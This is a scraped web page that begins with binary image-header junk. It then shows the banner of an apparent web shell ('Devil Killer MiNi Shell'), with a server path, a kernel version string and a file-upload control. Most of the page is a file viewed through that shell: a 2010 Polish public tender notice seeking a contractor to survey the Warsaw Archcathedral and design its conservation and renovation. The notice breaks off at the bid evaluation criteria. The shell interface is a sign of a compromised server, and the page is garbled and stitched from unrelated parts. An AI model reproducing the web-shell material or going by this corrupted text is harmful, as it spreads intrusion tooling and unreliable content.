JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100306/62262-N-2010.html

<p class="kh_header"><b>Warszawa: Wybór wykonawcy inwentaryzacji oraz wielobranżowego projektu budowlano-konserwatorskiego remontu Archikatedry Warszawskiej</b><br>
<b>Numer ogłoszenia: 62262 - 2010; data zamieszczenia: 06.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Parafia Archikatedralna św. Jana Chrzciciela w Warszawie , Ul. Kanonia 6, 00-278 Warszawa, woj. mazowieckie, tel. (022) 831 02 89, faks (022) 831 02 89.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katedra.mkw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Parafia Rzymskokatolicka.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór wykonawcy inwentaryzacji oraz wielobranżowego projektu budowlano-konserwatorskiego remontu Archikatedry Warszawskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wybór wykonawcy inwentaryzacji oraz wielobranżowego projektu budowlano konserwatorskiego remontu Archikatedry Warszawskiej
Szczegółowo przedmiot zamówienia określono w Załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia zamieszczonej na stronie internetowej Zamawiającego. 
Nomenklatura Wspólny Słownik Zamówień (CPV):
71.00.00.00-8: Usługi architektoniczne, budowlane, inżynieryjne i kontrolne.
71.20.00.00-0: Usługi architektoniczne i podobne.
71.32.00.00-7: Usługi inżynieryjne w zakresie projektowania.  
Wymagany termin wykonania zamówienia 90 dni od dnia podpisania umowy, ale nie później niż do dnia 30 czerwca 2010 r.

Opisywanie zadanie jest dwuetapowe. Realizacja pierwszego etapu (prace inwentaryzacyjne i badawcze) powinna zakończyć się sformułowaniem zaleceń projektowych będących podstawą do uzyskania wytycznych z Biura Stołecznego Konserwatora Zabytków. 
Dokumentacja projektowa powinna mieć charakter wielobranżowy i rozwiązywać kompleksowo wymienione w dalszych punktach problemy projektowe.
1. PRACE INWENTARYZACYJNE I BADAWCZE
1.1 Inwentaryzacja architektoniczna.
Pomiary do opracowania rysunków powinny być zrealizowane w technologii fotogrametrii cyfrowej, bądź skaningu laserowego uzupełnianych w miarę potrzeb pomiarami geodezyjnymi. Pomiary liniowe (taśmą, dalmierzem) mogą być stosowane jedynie jako pomiary uzupełniające i nie mogą stanowić podstawy opracowania inwentaryzacyjnego. 
Opracowania inwentaryzacyjne należy wykonać w formie rysunków wektorowych oraz ortofotoplanów. Dokumentacja inwentaryzacyjna musi być kompletna i spełniać wszystkie wymagania projektów architektonicznych i branżowych.
Inwentaryzacja powinna zawierać przynajmniej:
4 rzuty;
10 przekrojów (z widokami na obydwie strony każdy);
4 widoki elewacji.

Wszystkie pomiary i wynikowe opracowania inwentaryzacyjne winny być dowiązane do układu współrzędnych geodezyjnych Warszawa 25 i odniesione do poziomu 0 Wisły. Opracowania inwentaryzacyjne architektury należy zredagować do skali 1:50.
Kompletna dokumentacja inwentaryzacyjna powinna zawierać:
wszystkie rysunki inwentaryzacyjne wektorowe i rastrowe (w formie: wydruków wielkoformatowych w skali 1:50, dokumentacji elektronicznej w skali 1:50 w formacie PDF oraz zbiorów zgodnych z AutoCAD DWG+JPG;
wykaz opracowań (w formie: wydruku oraz dokumentacji elektronicznej w formacie PDF);
sprawozdanie techniczne z opisem zakresu prac, wykorzystanych technologii, uzyskanych dokładności (w formie: wydruku oraz dokumentacji elektronicznej w formacie PDF);
oświadczenie o zgodności opracowań z wymaganiami zapisów SIWZ oraz o kompletności dokumentacji i poszczególnych opracowań pod względem celu, któremu mają służyć (w formie: wydruku oraz dokumentacji elektronicznej w formacie PDF).

1.2. Kwerenda archiwalna oraz badania z zakresu historii i historii sztuki 
Kwerenda powinna uwzględniać: materiały ikonograficzne; dokumentacje projektowe i konserwatorskie, ekspertyzy oraz badania; literaturę naukową z zakresu historii sztuki i architektury obejmujące zgromadzenie wszystkich dostępnych materiałów dotyczących historii kościoła. Należy dotrzeć do inwentaryzacji oryginalnych elementów budynku i jego wyposażenia wykonanych przed odbudową, oraz informacji dotyczących wszystkich obiektów objętych projektem (zabytki ruchome) wraz ze szczegółową historią konserwacji. Zleceniobiorca jest zobowiązany.
1.3. Badanie przyczyn zasolenia i zawilgocenia murów 
Planowane prace badawcze zakładają zebranie informacji niezbędnych do sformułowania projektu mającego na celu rozwiązanie problemu zawilgocenia murów kościoła. 
1. Badanie instalacji odwodnienia (drożność, szczelność, przelotowość); badania te jednocześnie umożliwiają rozpoznanie geologiczne (odkopanie połowy rur spustowych w miejscach intensywnych zawilgoceń krypt)
2. Badanie stopnia zasolenia i zawilgocenia murów.
3. Badania geologiczne 
a. badanie przy rurach spustowych, 
b. wykonanie ok. 5 odwiertów geologicznych w sąsiedztwie miejsc intensywnie zawilgoconych w celu określenia warunków wodnych w otoczeniu podziemia Archikatedry.
Na podstawie wyników przeprowadzonych prac badawczych należy opracować wytyczne do projektu izolacji przeciwwodnej krypt oraz wytycznych do projektu instalacji odwodnienia.
1.4. Opracowanie wytycznych do projektu połączenia krypt.
Wykonanie projektu koncepcyjnego wraz z ekspertyzą konstrukcyjną. 
1.5. Badania mikroklimatyczne w kryptach archikatedry
a. Zbadanie stanu drożności systemu wentylacyjnego
b. Monitoring mikroklimatu podziemi w celu opracowania zaleceń z zakresu konserwacji prewencyjnej oraz opracowania wytycznych dla projektu wentylacji (czujniki do pomiaru temperatury i wilgotności względnej)
c. Oznaczenie krytycznych wartości RH, w których następuje uruchamianie soli na podstawie badania sorpcyjnego próbek murów ze wszystkich pomieszczeń.
1.6. Badania trumien i sarkofagów przechowywanych w kryptach archikatedry.
Badania mające na celu opracowanie programu prac zabezpieczających trumny i sarkofagi na czas remontu krypt oraz opracowanie wytycznych dla ekspozycji.
1.7. Koncepcja dostosowania obiektu do potrzeb osób niepełnosprawnych. 

Na podstawie rezultatów prac badawczych i inwentaryzacyjnych należy opracować zalecenia do prac projektowych które będą stanowiły podstawę do uzyskania wytycznych konserwatorskich ze strony Biura Stołecznego Konserwatora Zabytków. 
----------------------------------------------------------------------------------------------------------------------------------------------------
2. PROJEKTY
Prace projektowe powinny być prowadzone w oparciu o wytyczne konserwatorskie wydane przez Biuro Stołecznego Konserwatora Zabytków.
2.1. Program i projekt budowlano-konserwatorski likwidacji zawilgocenia krypt i ścian kościoła.
2.2. Projekt remontu kanalizacji deszczowej.
2.3. Projekt budowlany połączenia krypt.
2.4. Projekt architektoniczny aranżacji krypt i ich adaptacji dla ruchu turystycznego
Projekt systemu informacji wizualnej, projekt modernizacji ciągów  komunikacyjnych  i organizacji ruchu turystycznego,  projekt ekspozycji  trumien i sarkofagów.
2.5. Projekt modernizacji instalacji elektrycznej.
2.6. Projekt iluminacji wnętrza świątyni.
2.7. Projekt kolorystyki partii tynkowanych elewacji kościoła
W zależności od wytycznych konserwatorskich dla prac projektowych należy przewidzieć wykonanie odkrywek konserwatorskich w w/w partiach.
2.8. Projekty instalacji teletechnicznych
Instalacji przeciwpożarowej, alarmowej, kamer przemysłowych.
2.9. Projekt modernizacji systemu ogrzewania
Rozwiązanie modernizacyjne winno  polegać  na zredukowaniu istniejącego systemu zasilanego z ciepłowniczej sieci miejskiej do funkcji utrzymywania temperatury dyżurnej na poziomie  4-6oC oraz zamontowaniu w ławkach  lokalnego systemu grzewczego  uruchamianego na czas trwania liturgii, uroczystości lub imprez kulturalnych.  Zaprojektowany system winien stabilizować mikroklimat wnętrza, podnieść komfort cieplny osób przebywających w katedrze i obniżyć koszty eksploatacji.
2.10. Projekt konserwatorski konserwacji i restauracji elewacji kościoła
2.11. Projekt konserwatorski renowacji ścian i sklepień kościoła wraz z przestrzenią zakrystii. 
2.12. Projekt konserwacji i restauracji obiektów zabytkowych, przedmiotów artystycznych i pamiątek historycznych znajdujących się we wnętrzu kościoła.
a. Pełna  inwentaryzacja opisowa i fotograficzna każdego z obiektów.
b. Zgromadzenie i opracowanie  dokumentacji historycznej (patrz pkt. 1.2)
c. Wykonanie badań fizykochemicznych potrzebnych dla sformułowania szczegółowych programów prac konserwatorskich.
d. Szczegółowa ocena stanu zachowania i opracowanie indywidualnych programów prac konserwatorskich dla każdego z poszczególnych obiektów wraz ze szczegółową specyfikacją technologiczną.
e. Projekt aranżacji i sposobu eksponowania poszczególnych obiektów.

Lista obiektów objętych pracami projektowymi znajduje się w Załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia. Specyfikacja Istotnych Warunków Zamówienia znajduje się na stronie internetowej Zamawiającego. 


2.13. Projekt dostosowania obiektu do potrzeb osób niepełnosprawnych. 
2.14. Projekt modernizacji obiektów sanitarnych i dostosowanie do potrzeb ruchu turystycznego. 

3. POZOSTAŁE ZADANIA
3.1.  Wykonanie specyfikacji technicznej wykonania i odbioru robót, przedmiarów i kosztorysów inwestorskich.
3.2.  Szczegółowy harmonogram planowanych prac.  
3.3.  Uzyskanie pozwolenia na prowadzenie prac w Biurze Stołecznego Konserwatora Zabytków
3.4.  Uzyskanie pozwolenia na budowę. 

Obowiązki Wykonawcy w trakcie procesu projektowego
Wykonawca jest zobowiązany do uzyskania wszelkich uzgodnień i pozwoleń pozwalających na przystąpienie do prac realizacyjnych na podstawie wykonanych projektów. W tym celu Zamawiający udzieli Wykonawcy właściwych pełnomocnictw oraz udostępni niezbędne, wymagane prawem dokumenty.
Do obowiązków Wykonawcy należy: 
Przeprowadzanie konsultacji z przedstawicielami Zamawiającego na każdym etapie opracowania dokumentacji, dotyczących istotnych, mających wpływ na koszty elementów, rozwiązań funkcjonalnych i konstrukcyjnych.
Po zakończeniu każdego z dwóch etapów prac i przed rozpoczęciem ubiegania się o wymagane uzgodnienia (wytyczne konserwatorskie, decyzja o pozwoleniu na prowadzenie prac, pozwolenie na budowę) przedłożenie Zamawiającemu kompletnej dokumentacji celem uzyskania ostatecznej akceptacji.
Opisywanie proponowanych materiałów i urządzeń poprzez podanie parametrów technicznych, gatunków materiału przy zachowaniu wymogów Ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. art. 29. Umożliwi to Zamawiającemu przeprowadzenie przetargu na wybór Wykonawcy robót budowlanych wg niniejszej dokumentacji. 
Wszelkie opłaty administracyjne ponoszone w wyniku prowadzonych działań związanych z uzyskiwaniem uzgodnień, opinii i decyzji Wykonawca winien wliczyć do ceny opracowania dokumentacji projektowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.20.00.00-0, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest do wniesienia wadium w wysokości 10 000 PLN (słownie: dziesięć tysięcy złotych 00/100). Wadium może być wniesione w następujących formach:
a)	pieniądzu - przelewem na rachunek bankowy:  62 1240 1138 1111 0010 0245 7362
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007 r., Nr 42, poz. 275).
2) Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za wniesione w terminie tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że środki zostały zaksięgowane na koncie Zamawiającego przed upływem terminu składania ofert.
3) Gwarancję i poręczenia należy wystawiać na: Rzymsko - Katolicka Parafia Archikatedralna Św. Jana Chrzciciela w Warszawie, 00-278 Warszawa, ul. Kanonia 6. 
4) W przypadku przesyłania poręczenia lub gwarancji pocztą/kurierem, oryginał gwarancji należy przesłać na adres: Rzymsko - Katolicka Parafia Archikatedralna Św. Jana Chrzciciela w Warszawie, 00-278 Warszawa, ul. Kanonia 6
5) Wykonawca, który nie wniesie wadium w wyznaczonym terminie zostanie wykluczony.
6) Wykonawca zobowiązany jest dołączyć do oferty dowód wniesienia wadium. Do oferty należy dołączyć kopię polecenia przelewu lub kserokopię potwierdzoną za zgodność z oryginałem - przez osoby odpowiednio upoważnione do reprezentowania Wykonawcy.
7) Zamawiający zwróci niezwłocznie wadium, jeżeli:
a)	upłynął termin związania ofertą,
b)	zawarto umowę w sprawie zamówienia publicznego,
c)	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a odwołanie zostało ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
8)	Zamawiający zwróci wadium - z zastrzeżeniem art. 46 ust. 4a ustawy Pzp, tj. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie - niezwłocznie, na wniosek Wykonawcy:
a)	który wycofał ofertę przed upływem terminu składania ofert,
b)	który został wykluczony z postępowania,
c)	którego oferta została odrzucona.
9)	Zamawiający zatrzymuje ponadto wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	omówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 
10)	Złożenie wniosku, o którym mowa w pkt. 9, przez Wykonawcę wykluczonego z postępowania lub którego oferta została odrzucona jest równoznaczne ze zrzeczeniem się przez Wykonawcę prawa do wniesienia odwołania.
11)	Zamawiający zażąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium, z powodu wykluczenia ich z postępowania (lub odrzucenia ofert), jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania unieważniono czynność ich wykluczenia (lub odrzucenia ich ofert).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie złożonych wraz z ofertą dokumentów i oświadczeń, o których mowa w punkcie 7 i 8 SIWZ, zamieszczonej na stronie internetowej Zamawiającego zgodnie z formułą spełnia/nie spełnia (niespełnienie chociażby jednego warunku spowoduje wykluczenie Wykonawcy z postępowania).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie złożonych wraz z ofertą dokumentów i oświadczeń, o których mowa w punkcie 7 i 8 SIWZ, zamieszczonej na stronie internetowej Zamawiającego zgodnie z formułą spełnia/nie spełnia (niespełnienie chociażby jednego warunku spowoduje wykluczenie Wykonawcy z postępowania).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie złożonych wraz z ofertą dokumentów i oświadczeń, o których mowa w punkcie 7 i 8 SIWZ, zamieszczonej na stronie internetowej Zamawiającego zgodnie z formułą spełnia/nie spełnia (niespełnienie chociażby jednego warunku spowoduje wykluczenie Wykonawcy z postępowania).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie złożonych wraz z ofertą dokumentów i oświadczeń, o których mowa w punkcie 7 i 8 SIWZ, zamieszczonej na stronie internetowej Zamawiającego zgodnie z formułą spełnia/nie spełnia (niespełnienie chociażby jednego warunku spowoduje wykluczenie Wykonawcy z postępowania).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie złożonych wraz z ofertą dokumentów i oświadczeń, o których mowa w punkcie 7 i 8 SIWZ, zamieszczonej na stronie internetowej Zamawiającego zgodnie z formułą spełnia/nie spełnia (niespełnienie chociażby jednego warunku spowoduje wykluczenie Wykonawcy z postępowania).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany Formularz oferty, przygotowany zgodnie ze wzorem podanym w Załączniku nr 3 do SIWZ, umieszczonego na stronie internetowej Zamawiającego.
Parafowany na wszystkich stronach przez Wykonawcę lub osobę upoważnioną wzór umowy, Załącznik nr 6 do SIWZ;
Pełnomocnictwo, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestracyjnym oraz w przypadku podmiotów występujących wspólnie.
Wykonawca zobowiązany jest do dołączenia do oferty Metodologię wykonania zamówienia, podlegającą ocenie, zgodnie z pkt. 11  SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
